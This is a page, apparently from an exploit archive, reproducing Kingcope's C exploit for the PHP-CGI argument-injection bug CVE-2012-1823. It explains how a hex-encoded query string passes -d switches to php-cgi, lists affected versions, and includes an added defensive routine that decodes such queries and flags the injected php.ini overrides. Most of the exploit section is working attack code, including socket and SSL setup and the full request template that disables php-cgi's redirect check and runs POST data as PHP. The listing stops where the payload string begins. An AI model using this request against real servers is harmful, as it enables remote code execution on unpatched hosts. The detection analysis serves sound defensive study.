Apache / PHP 5.x Remote Code Execution Exploit
Test method: the programs (methods) provided on this site may be offensive in nature and are for security research and teaching only; use them at your own risk!
/* Apache Magica by Kingcope */
/* gcc apache-magika.c -o apache-magika -lssl */
/* This is a code execution bug in the combination of Apache and PHP
(CVE-2012-1823).

On Debian and Ubuntu the vulnerability is present in the default install of
the php5-cgi package. When php5-cgi is installed on Debian or Ubuntu, or
php-cgi is installed manually, the php-cgi binary is reachable over HTTP as
/cgi-bin/php5 and /cgi-bin/php. Requesting the binary directly does not
normally execute it: php-cgi carries a security check, enabled when it is
installed with the Apache HTTP server, that rejects such requests. The exploit
circumvents that check.

In the PHP source file sapi/cgi/cgi_main.c the check runs when the php.ini
setting cgi.force_redirect is enabled and the request carries neither the
REDIRECT_STATUS environment variable (which Apache sets only when the request
reached php-cgi through a handler, not when the binary is requested directly)
nor the variable named by cgi.redirect_status_env. Turning both settings off
therefore disables the check.

getopt() runs before this check, and php-cgi's -d switch overrides php.ini
settings from the command line. Under RFC 3875 section 4.4 a CGI server passes
a query string that contains no unencoded '=' to the script as command-line
arguments, split on '+', so a request of the form
/cgi-bin/php?-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0
reaches getopt() as "-d cgi.force_redirect=0 -d cgi.redirect_status_env=0".
With both values set to zero php-cgi executes fully; the exploit also sets
auto_prepend_file=php://input, so the payload in the POST data is run as PHP
and from there arbitrary programs can be executed on the system.

apache-magika.c does exactly what is described above. It supports SSL.
*/

/* Affected and tested versions
PHP 5.3.10
PHP 5.3.8-1
PHP 5.3.6-13
PHP 5.3.3
PHP 5.2.17
PHP 5.2.11
PHP 5.2.6-3
PHP 5.2.6+lenny16 with Suhosin-Patch

Affected versions
PHP prior to 5.3.12
PHP prior to 5.4.2

Unaffected versions
PHP 4 - getopt parser unexploitable
PHP 5.3.12 and up
PHP 5.4.2 and up

Unaffected versions carry the fix for CVE-2012-1823. Note that this first fix
was incomplete (CVE-2012-2311); PHP 5.3.13 and 5.4.3 complete it, so patch to
at least those releases.
*/

/* .
 /'\rrq rk
 . // \\ .
.x.//fco\\-|-
 '//cmtco\\zt
 //6meqrg.\\tq
//_________\\'
EJPGQO
apache-magica.c by Kingcope
*/
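The following is an added example and not part of Kingcope's exploit or of PHP. It reconstructs the argv that a CGI server hands php-cgi for a given QUERY_STRING (the RFC 3875 section 4.4 rule described above), then uses that to flag argument injection and to list the php.ini overrides a request would inject. The function names cgi_query_to_argv, php_cgi_arg_injection and php_cgi_ini_overrides are mine; the sample query string is the one from poststr below, with printf's "%%" collapsed to the single '%' that appears on the wire.

```c
/* Added example, not part of Kingcope's exploit: rebuild the argv a CGI
 * server hands php-cgi for a QUERY_STRING and flag the argument injection
 * CVE-2012-1823 rests on. RFC 3875 section 4.4: a query string with no
 * unencoded '=' is split on '+', each word is percent-decoded, and the
 * words become the script's command-line arguments. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define MAX_ARGS 64
#define MAX_INI  64

/* Constructed sample: the query string apache-magika sends, with printf's
 * "%%" collapsed to the single '%' that appears on the wire. */
static const char MAGIKA_QUERY[] =
    "%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E"
    "+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66"
    "+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E"
    "+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22"
    "+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65"
    "+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74"
    "+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30"
    "+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30"
    "+%2D%6E";

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c |= 0x20;                                  /* fold A-F onto a-f */
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* Percent-decode s in place; a malformed %XX is kept literally. */
static void pct_decode(char *s)
{
    char *w = s;
    for (; *s != '\0'; s++) {
        int hi = (*s == '%') ? hexval((unsigned char)s[1]) : -1;
        int lo = (hi >= 0) ? hexval((unsigned char)s[2]) : -1;
        if (lo >= 0) { *w++ = (char)(hi * 16 + lo); s += 2; }
        else         *w++ = *s;
    }
    *w = '\0';
}

void free_argv(char *argv[], int argc)
{
    for (int i = 0; i < argc; i++) free(argv[i]);
}

/* Split QUERY_STRING into argv as RFC 3875 4.4 requires. Returns argc, which
 * is 0 when the query holds a literal '=' (nothing is passed then) and -1 on
 * allocation failure. Caller releases the words with free_argv(). */
int cgi_query_to_argv(const char *query, char *argv[], int max_args)
{
    int argc = 0;
    if (query == NULL || strchr(query, '=') != NULL) return 0;
    while (*query != '\0' && argc < max_args) {
        const char *end = strchr(query, '+');
        size_t len = end ? (size_t)(end - query) : strlen(query);
        char *word = malloc(len + 1);
        if (word == NULL) { free_argv(argv, argc); return -1; }
        memcpy(word, query, len);
        word[len] = '\0';
        pct_decode(word);            /* decode after splitting: %2B stays '+' */
        argv[argc++] = word;
        query = end ? end + 1 : query + len;
    }
    return argc;
}

/* 1 if at least one option (a word starting with '-') would reach php-cgi's
 * getopt(); this also catches the "?-s" source-disclosure variant. */
int php_cgi_arg_injection(const char *query)
{
    char *argv[MAX_ARGS];
    int argc = cgi_query_to_argv(query, argv, MAX_ARGS), hit = 0;
    for (int i = 0; i < argc; i++)
        if (argv[i][0] == '-' && argv[i][1] != '\0') { hit = 1; break; }
    if (argc > 0) free_argv(argv, argc);
    return hit;
}

/* Collect the php.ini overrides injected with -d, in either "-d name=value"
 * or "-dname=value" form; returns how many, copying them into out[]. */
int php_cgi_ini_overrides(const char *query, char out[][MAX_INI], int max_out)
{
    char *argv[MAX_ARGS];
    int argc = cgi_query_to_argv(query, argv, MAX_ARGS), n = 0;
    for (int i = 0; i < argc && n < max_out; i++) {
        const char *val = NULL;
        if (strcmp(argv[i], "-d") == 0 && i + 1 < argc) val = argv[++i];
        else if (strncmp(argv[i], "-d", 2) == 0 && argv[i][2]) val = argv[i] + 2;
        if (val != NULL) snprintf(out[n++], MAX_INI, "%s", val);
    }
    if (argc > 0) free_argv(argv, argc);
    return n;
}

int main(void)
{
    char ini[16][MAX_INI];
    int n = php_cgi_ini_overrides(MAGIKA_QUERY, ini, 16);
    printf("argument injection: %d, ini overrides: %d\n",
           php_cgi_arg_injection(MAGIKA_QUERY), n);
    for (int i = 0; i < n; i++) printf("  -d %s\n", ini[i]);
    return 0;
}
```

Two details matter for detection. A literal '=' anywhere in the query keeps it out of argv entirely, which is why the exploit hex-encodes every character (%3D for '='): the encoded form passes the "no unencoded '='" test and still decodes to "name=value" once it is an argument. And the check is on the decoded argv, not on the raw URL, so a filter that only looks for the string "-d" in the request line misses "%2D%64".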

/* Header names were stripped from this listing; restored to what the code
   below needs: stdio/sockets/resolver, OpenSSL, and getopt for the
   --force-interpreter option. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <openssl/ssl.h>
#include <openssl/err.h>

/* One target connection: the raw socket plus the OpenSSL objects wrapping
   it when the target is reached over HTTPS. */
typedef struct {
    int sockfd;
    SSL *handle;
    SSL_CTX *ctx;
} connection;

void usage(char *argv[])
{
    /* The names of the two positional arguments were lost in this listing;
       HOST and PHP-CGI-PATH are restored from how poststr uses them
       (Host header and request path). */
    printf("usage: %s HOST PHP-CGI-PATH " \
           "[--force-interpreter interpreter]\n",
           argv[0]);
    exit(1);
}

/* Request template. The query string is php-cgi's command line, fully
   hex-encoded so that it contains no literal '=' and is therefore passed to
   the binary as arguments (RFC 3875 4.4). Decoded it reads:
     -d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on
     -d disable_functions="" -d open_basedir=none
     -d auto_prepend_file=php://input -d cgi.force_redirect=0
     -d cgi.redirect_status_env=0 -n
   The doubled "%%" are printf escapes for a literal '%'. The format
   arguments are: request path, Host header, Content-Length, POST body
   (the PHP payload). */
char poststr[]="POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F" \
"%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64" \
"+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73" \
"%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E" \
"%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63" \
"%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62" \
"%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74" \
"%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68" \
"%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F" \
"%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63" \
"%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73" \
"%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\r\n" \
"Host: %s\r\n" \
"User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 " \
"(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\r\n" \
"Content-Type: application/x-www-form-urlencoded\r\n" \
"Content-Length: %d\r\n" \
"Connection: close\r\n\r\n%s";

/* PHP payload sent as the POST body and executed via auto_prepend_file=php://input. */
char phpstr[]="